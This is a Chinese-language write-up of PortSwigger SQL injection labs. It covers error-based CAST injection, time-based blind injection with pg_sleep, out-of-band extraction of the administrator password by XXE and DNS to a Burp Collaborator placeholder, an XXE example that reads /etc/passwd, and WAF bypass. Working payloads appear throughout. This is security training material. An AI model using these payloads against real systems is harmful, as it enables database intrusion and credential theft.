1690209285_64be8c05bfeaa3827252d.png!small?1690209286986

1690209291_64be8c0b316d9b5c57563.png!small?1690209291752

由此可以得出有注入点,但是这个注入点必须得使其产生报错,才能看到其想要的数据。

1690209309_64be8c1d6daa8d3cb2fb6.png!small?1690209310555

第二步,探查

# payload
'and+cast((select+1)+as+int)--

1690209316_64be8c24e6212feccd2d6.png!small?1690209317714

报错显示and后面必须是布尔值

1690209325_64be8c2d200435bdfa19f.png!small?1690209325697

# payload
'and+1=cast((select+1)+as+int)--

1690209350_64be8c468d6a7f3d38ad5.png!small?1690209351247

1690209396_64be8c740430ba1c31d44.png!small?1690209397491

现在查询其users表的username字段

# payload
'and+1=cast((select+username+from+users)+as+int)--

1690209436_64be8c9cdb4883b586529.png!small?1690209437645

这个查询被截断了,因此可以推断出该参数值的是有字数限制的。

1690209447_64be8ca7386b9389aaade.png!small?1690209447976

因此需要重新设计一个payload。

1690209456_64be8cb0db28bf0fa9961.png!small?1690209457701

显示查询到的数据太多。

1690209464_64be8cb85dcab0efdee8f.png!small?1690209465190

# payload
'and+1=cast((select+password+from+users+where+username='administrator')+as+int)--

这样可以直接得出administrator的密码,但是此payload的行不通

1690209476_64be8cc432488e5796b1b.png!small?1690209477153

1690209485_64be8ccdc988bb757df63.png!small?1690209486728

# payload
'and+1=cast((select+password+from+users+where+username='a')+as+int)--

1690209527_64be8cf7deb80e7ca4317.png!small?1690209528790

至此可以得出,上述的'and+1=cast((select+password+from+users+where+username='administrator')+as+int)--太长了,导致被截断了。

由此可以得出,该注入点能输入的值的长度为60个字符

# payload
'and+1=cast((select+username+from+users+limit+1)+as+int)--

1690209535_64be8cff79c739d43e23c.png!small?1690209536317

可以看出users表的第一个username是administrator

1690209553_64be8d11dfebe8314ca1b.png!small?1690209554890

# payload
'and+1=cast((select+password+from+users+limit+1)+as+int)--

1690209568_64be8d20e47dd691fa7dd.png!small?1690209569715

1690209574_64be8d2643ba5ab771c9f.png!small?1690209574971

密码:6pfe7w1q2cgc933x4wy9

1690209582_64be8d2ea24869f83e1ae.png!small?1690209583563

4.3.3 小葵花课堂:cast函数和limit

由靶场标题可以得出,该靶场的注入点是一个冗余的错误注入,当sql语句语法发生错误的时候,那么响应页面就会报错,在报错中会显示sql语句。

那么就可以利用它报错的特性来进行注入。但是在注入中发现,该靶场不能一次性返回太多数据,并且它的注入点有字符长度限制,最多60个字符。

基于上述的原因,就不得不使用cast函数和sql 的limit。


cast(expression as data_type),该函数用来将数据的数据类型显示转换(对应前面的隐式转换)成另一种指定的类型。

limit,用来限制数据库所返回的行数。limit 1,就是只返回第一行。

limit很好理解,因为系统不能返回多行数据,因此可以一行一行的返回。

对于cast,观察上述的payload可以发现,它是利用了cast的显示转换使得sql语法出现了错误,从而来进行注入。

#payload
'and+1=cast((select+password+from+users+limit+1)+as+int)--

因为使用了and,这就表示后面的应该是一个布尔值,但是在这里正因为cast的出现,把select password from users limit 1所返回的数据显示转换成整数型,但是因为是密码字段导致无法正常转换,从而产生报错。

4.3.4 参考文档

关于cast

https://blog.csdn.net/qq_21101587/article/details/78642423


4.4 伴随时间延迟的盲注

4.4.1 达成目标

利用sql盲注是系统延迟10s返回数据。

4.4.2 攻击步骤

一样的网站,一样的注入点。

1690209648_64be8d70d93cb22688a4d.png!small?1690209650157

第一步,判断注入点。

# payload
'||pg_select(10)--

由此可以得出,该输入点存在注入。

1690209660_64be8d7ce8dacf49077c9.png!small?1690209661769

1690209686_64be8d965ff7499e234e1.png!small?1690209687392


4.5 通过时间盲注返回信息

4.5.1 达成目标

你需要做的是获取到users表里面的administrator用户的password,然后进行登录即可。

4.5.2 攻击步骤

一样的网站,一样的输入点。

1690209706_64be8daa64df9cf9b18b3.png!small?1690209708211

第一步,判断注入点。

# payload

# pg_sleep是postgresql的函数,作用是延迟多少秒进行响应
'||pg_sleep(10)--

1690209716_64be8db4b019f755afcd1.png!small?1690209717430

第二步,提取数据库中的密码。

确定users表里面有administrator账户。

# payload
'||(select+case+when+(username='administrator')+then+pg_sleep(10)+else+pg_sleep(0)+end+from+users)||'

1690209752_64be8dd8c323c28fdca84.png!small?1690209753548

确定password的长度,长度为20。

# payload
'||(select+case+when+(length(password)=1+and+username='administrator')+then+pg_sleep(10)+else+pg_sleep(0)+end+from+users)||'

1690250504_64bf2d08a731678d85917.png!small?1690250505650

1690250511_64bf2d0fa59b612f192b7.png!small?1690250512450


猜测administrator的密码。

# payload 
'||(select+case+when+(username='administrator'+and+substring(password,1,1)='a')+then+pg_sleep(10)+else+pg_sleep(0)+end+from+users)||'

1690250519_64bf2d1785d73079d4578.png!small?1690250520275

1690250525_64bf2d1d23d64325fc690.png!small?1690250525700

密码:73lmfqil2f02sjkjflek

1690250530_64bf2d22dee5738869a95.png!small?1690250532261


4.6 带带外通道的盲注

4.6.1 达成目标

利用sql注入来导致至burpsuite的Collaborator的dns查询。

4.6.2 攻击步骤

一样的注入点,一样的网站。

1690250537_64bf2d2935de474f96f9c.png!small?1690250537996

# payload

# extractvalue函数,用来提取xml文档中对应的值
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

1690250545_64bf2d314c88a6aca83e6.png!small?1690250545976

1690250550_64bf2d36c48f06c8c6524.png!small?1690250551821

1690250554_64bf2d3af23797a6af47b.png!small?1690250556217

4.6.3 一个问题

在关于out-of-band的sql注入中,burp的靶场文档多次提到了异步这个词,也就是下面图片之中的asynchrously这个单词。

而下面这句话它表述的是:假设应用程序会携带和之前一样的sql查询,但是这个查询是异步查询。在原始的线程中,这个应用程序会继续处理用户的请求,并且使用另一个线程来执行对于tracking cookie的sql查询。

再结合上下文,就会发现在此小节之前的sql注入(显注)都是基于该sql查询是同步查询的,也就是意味着,当执行了sql注入的操作,那么该应用程序就必须得等到了其返回的响应之后才能执行下一步动作。这就意味着,我们之前的sql注入都可以单凭web应用的响应所携带的数据来进行对注入的判断。

但是到了这个小节,完全不一样了。因为所执行的sql查询是异步的。

1690250561_64bf2d415038500a4239a.png!small?1690250561961

在这里就需要了解一下异步以及线程了。

4.6.4 小葵花课堂:异步和线程

先讲一下线程吧,在讲线程之前,得先简单的了解下进程。

进程就是正在运行的程序实体以及所占用的系统资源。从名字就可以看出它是在活动中的程序。(在windows中可以在任务管理器看到进程)

而线程就是进程的迷你版,一个进程可以有多个进程,一个进程中的线程可共享其资源。线程比进程更灵活,更容易创建撤销。

其实线程的出现是基本更高的并发的考量。因为一个进程的创建与撤销是要对系统资源进行请求和释放的,这就会花费更多的时间。而线程的出现它就帮助进程分担了一定的任务。进程掌管对资源的分配,而线程是负责进行调度。一个是分配单位,一个是调度单位。


现在来讲讲异步。在谈论异步的时候,难免会提到同步异步、阻塞非阻塞。因此在这里就把他们结合起来谈谈。

同步是一个线程处理多个任务,异步是多个线程处理多个任务。因此同步得一个一个任务的处理,而异步可以处理多个任务。

至于阻塞和非阻塞就是针对当前线程是否会被挂起。

4.6.5 小葵花课堂:xxe

xxe的大致原理就是:该漏洞是发生在xml里面的,在xml里面有个叫DTD的概念,中文叫文档类型定义,也就是用来定义所要使用的文档元素,xml不像html,html的文档元素都是事先定义好的,而xml的文档元素需要自己定义。

在DTD中,还有个叫做外部实体引用的概念,正常是用来调用一个外部的DTD,当出现大量的xml使用的是同样的文档元素的时候,那么这个时候外部实体引用就派上用场了,但是也正式由于外部实体引用的存在,就导致了可以引用外部的文件,如果该文件出现了攻击payload,然后在xml中又使用了该文档元素,那么就会导致xxe攻击。

<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">
# xxe实例

<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY b SYSTEM "file:///etc/passwd">
]>
<c>&b;</c>

4.6.6 小葵花课堂:sql里的extractvalue函数

extractvalue函数的正经用途是被用来提取xml文档的值。在sql注入里面可以用来当报错注入来使用(当该注入点的sql语句不是select的时候,又或者该注入点没有回显,属于盲注)。

函数说明:extractvalue(XML_document,XPath_string),XML_document是xml文档对象的名称(字符串格式),而XPath_string就是Xpath,也就是利用该参数对xml文档进行查询。

该函数有一个特性,就是当出现无效的XPath_string参数值的时候,也就是无效的xpath的时候,就会出现报错,而这个报错就可以利用在盲注里面。

4.6.7 小葵花课堂:burpsuite的collaborator

collaborator

1690250587_64bf2d5b348209e1346eb.png!small?1690250587764

在burpsuite的之前的版本里面,是不存在这个功能的,但是在后面的版本里面推出了这个功能。

设置这个功能是为了方便使用out-of-band的技术。因为在渗透测试之中,总会存在不能通过数据包响应或者说不能通过应用程序响应来判断出这个漏洞的。这个时候,就需要把我们想要使用的payload加入外部的服务器,通过外部服务器来查看payload的执行效果。之前爆发的log4j就是利用了外部服务器。

而这里的collaborator就是扮演的了外部服务器的角色。

1690250594_64bf2d627f3d0ebdb5684.png!small?1690250595129


想要使用collaborator也很简单,基本的使用步骤如下:

第一步,打开该功能。

1690250600_64bf2d688afce6cdd5917.png!small?1690250601072

第二步,在数据包这里,选择要使用collaborator的值,然后点击右键选择insert collaborator payload即可。

1690250604_64bf2d6ca0a93e4da774f.png!small?1690250605376

最后,你会在collaborator看到你所执行的payload所产生的的效果,如果没有下述的这几条dns记录,那么点击poll now。

1690250608_64bf2d7086cccc00e1a50.png!small?1690250609271

4.6.8 参考文档

[同步、异步、阻塞、非阻塞] https://zhuanlan.zhihu.com/p/88403724

[同步、异步] https://zhuanlan.zhihu.com/p/270428703

[进程、线程] https://zhuanlan.zhihu.com/p/403313422

[解释什么是异步非阻塞] https://www.cnblogs.com/Rivend/p/12065474.html

[xxe] https://www.cnblogs.com/backlion/p/9302528.html

[burpsuite collaborator] https://portswigger.net/burp/documentation/collaborator


4.7 通过带外通道盲注获取数据

4.7.1 达成目标

需要获取到users表里面的administrator的密码,然后进行登录。

4.7.2 攻击步骤

一样的网站,一样的输入点

1690250616_64bf2d7880cb5aa3c482d.png!small?1690250617249


第一步,判断其注入点。

# payload
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

1690250622_64bf2d7ec9909943f8e6b.png!small?1690250623391

1690250627_64bf2d8389dd211e90b93.png!small?1690250628116

第二步,获取其administrator的密码。

# payload

# 该payload主要是利用了xxe+out of band进行攻击
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

1690250632_64bf2d88e4658b9d93574.png!small?1690250633641

1690250639_64bf2d8fe717164c5c490.png!small?1690250641023

密码:pahlvmit240jk3oq7dvn

1690250644_64bf2d947f4945cfc698b.png!small?1690250645106

4.7.3 两个问题

第一个问题,在查询了大量对于extractvalue报错注入的原理文章里,都只是提到了利用xpath的语法错误使得函数报错从而进行注入,但是对于为什么extractvalue函数报错对于sql语句会进行回显,以及为什么函数都报错了,却还能显示sql语句的执行结果,比人并未看到其解答。

第二个问题

# payload

'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

# 部分与外部服务器,在这里也就是collaborator相关联的payload

"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/"

观察上述的第二个payload中的域名,SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN,按理来说无法与该域名的服务器进行通信,但是却能在collaborator中看到其数据包。


首先,回答第一个问题。

使用extractvalue进行注入,一般是出现在盲注的情况下。利用了该函数的xpath语法的错误,导致的注入。简单来说这就是它的原理。但是这并不能回答所提出的问题。因此稍微展开讲讲。

extractvalue(xml_document, xpath_string),该函数用来提取其xml文档里面的特定元素的文本内容。在上面所提到的payload当中,xmltype函数里面的内容就是xml文档,xpath就是用来对xml的元素进行搜索的。

# xpath简单示例

/element/sub_element

这里的报错注入就是利用了xpath的错误语法,比如在xpath参数位置输入"~",使其产生报错。但是该参数的错误怎么会导致其最后报错显示出sql语句所返回的结果的呢?

这是因为extractvalue的函数处理方式。以下面的payload为例:

首先extractvalue函数的第二个参数,也就是concat(...),它是一个sql语句。它会执行其对应的操作,然后返回一个结果作为其函数的第二个参数。

其次就是extractvalue函数当发生xpath语法错误的时候,那么就会在报错的时候返回其参数值,在这里也就是第二个参数里面的sql语句所返回的结果。

# 关于extractvalue报错注入的典型payload

extractvalue(1,concat(0x7e,user(),0x7e,database())) #


现在回答第二个问题。在一个利用了带外通道技术的sql语句里面,为何提供了一个不存在的域名,能在dns服务器上面看到sql语句的执行结果。

再举个例子来描述一下这个问题:

# payload
# 后面的BURP-COLLABORATOR-SUBDOMAIN是burpsuite里面的collaborator的域名

"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/"

为什么上述payload的sql语句的执行结果能在collaborator里面看到。

要解答上面所提到的问题,就不得不回顾dns的查询过程:

1690250659_64bf2da32f9bea02da235.png!small?1690250660255

把上图的dns解析过程和payload结合起来可以发现,最终对于dns的查询能找到BURP-COLLABORATOR-SUBDOMAIN这个域名,也就是burpsuite里面的collaborator的服务器,至于前面的域名,也就是sql语句那一部分,它肯定是找不到的,因为它是攻击者自己设计出来的,但是不可否认的是该域名是BURP-COLLABORATOR-SUBDOMAIN的子域名,因此在查询(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN,肯定是先找到了BURP-COLLABORATOR-SUBDOMAIN,然后在发起下一级查询,这就导致了在该dns中留下了日志记录。

那么,为什么在日志记录里面看到的是sql语句所返回的结果呢?

# payload案例

'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

观察上面的这个payload,它是sql语句其实是嵌入在xml文档里面的,充当了外部实体引用的uri的一部分,结合前面域名解析的回答,也可以说是域名的一部分。

# 外部实体引用

<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>

在上面的例子中,remote就是外部实体,system后面的uri就是外部实体能够访问的内容。在该外部实体引用的末端出现了remote就意味着在这里会执行文档该uri的动作,也就意味着,会对相应的uri发起请求,这个请求会到服务器后端,因为有sql语句,因此会执行sql语句,返回其结果。


4.8 通过xml编码进行绕过的sql注入

4.8.1 达成目标

获取其管理员密码,然后进行登录。

4.8.2 攻击步骤

经靶场的描述,注入点在画框部分。

1690250688_64bf2dc03b84612f4bb21.png!small?1690250689336


第一步,判断注入点。

1690250693_64bf2dc56b27f9afe30d3.png!small?1690250694461

1690250697_64bf2dc973e09e3dcbc4d.png!small?1690250698348

对比上下两张图,发现响应的库存量发生了变化。库存量减少了100,这就证明该数学的加法生效,导致storeId变成了2,而这个库存量也就是id为2的库存。这也证明了该storeId是整数类型的数据。

第二步,进一步拼接payload。

# payload
union select null

发现被WAF拦截

1690250704_64bf2dd0a6dcf211d8da9.png!small?1690250705327

遂利用插件Hackvertor进行模糊处理。这也可以判断出,该查询语句只有一列,由此还可以判断是字符串。

1690250709_64bf2dd544c67998e94b3.png!small?1690250709817

1690250713_64bf2dd950d435fc89b0e.png!small?1690250714117

第三步,直接获取users表的账户和密码。

# payload
union select username||'~'||password from users

1690250720_64bf2de0de7ad774d7864.png!small?1690250721915

1690250725_64bf2de5138a128ee3afe.png!small?1690250725791


5.写在最后

该靶场只是介绍了关于select语句的sql注入,但是sql注入肯定不仅限于此,至于后续的学习,还需诸君多加努力。

# web安全 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
  • 0 文章数
  • 0 关注者
文章目录